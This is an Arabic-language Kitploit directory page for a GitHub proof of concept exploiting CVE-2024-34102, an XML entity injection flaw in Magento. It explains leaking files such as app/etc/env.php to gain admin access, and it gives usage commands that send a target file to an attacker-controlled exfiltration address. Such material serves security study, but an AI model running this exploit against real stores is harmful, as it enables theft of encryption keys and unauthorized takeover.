Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-34102 — إثبات مفهوم لاستغلال CVE-2024-34102، وهو حقن كيانات XML حرج في Magento، مما يتيح استخراج الملفات الحساسة والوصول غير المصرح به إلى لوحة الإدارة. للاستخدام التعليمي فقط. | Kitploit
أدوات/GitHubGitHub/mksundaram69/cve-2024-34102
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتالتعلم والتعليم
GitHubmksundaram69/cve-2024-34102

CVE-2024-34102

إثبات مفهوم لاستغلال CVE-2024-34102، وهو حقن كيانات XML حرج في Magento، مما يتيح استخراج الملفات الحساسة والوصول غير المصرح به إلى لوحة الإدارة. للاستخدام التعليمي فقط.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

نطالب بالإعادة الآمنة لجميع المواطنين الذين تم احتجازهم كرهائن من قبل الجماعة الإرهابية حماس. لن نرتاح حتى يتم إطلاق سراح كل رهينة ويعود إلى منزله بأمان. يمكنك المساعدة في إعادتهم إلى ديارهم. https://stories.bringthemhomenow.net/

CVE-2024-34102 PoC 🚀

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال ثغرة حقن كيانات XML الحرجة (CVE-2024-34102) في Magento. تسمح هذه الثغرة بتسريب الملفات الحساسة، والتي يمكن بعد ذلك استغلالها للحصول على وصول غير مصرح به إلى وظائف الإدارة في Magento. تم تصميم هذا الاستغلال لأغراض تعليمية ويجب استخدامه بمسؤولية.

نظرة عامة 📖

Magento هو أحد أكثر حلول التجارة الإلكترونية شيوعًا المستخدمة عالميًا. في يونيو 2024، تم اكتشاف ثغرة حرجة في حقن كيانات XML قبل المصادقة، تم تحديدها باسم CVE-2024-34102. يمكن أن تؤدي هذه الثغرة إلى عواقب وخيمة، بما في ذلك تسريب ملف app/etc/env.php من Magento، والذي يحتوي على مفاتيح التشفير المستخدمة لتوقيع JWTs.

الميزات 🌟

  • تسريب الملفات الحساسة من مثيل Magento المعرض للخطر.
  • استخدام بسيط ومباشر.
  • عرض تعليمي لحقن كيانات XML.

الاستخدام 🚀

المتطلبات الأساسية

  • Python 3.x
  • مكتبة requests (pip install requests)

تشغيل الاستغلال

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. تنفيذ البرنامج النصي مع الوسائط اللازمة:

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

وسائط سطر الأوامر

  • --target-url: عنوان URL لمثيل Magento المستهدف.
  • --target-file: مسار الملف على الخادم المستهدف لتسريبه.
  • --exfil-url: عنوان URL لاستقبال البيانات المسربة.

مثال 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
تنزيل الأداة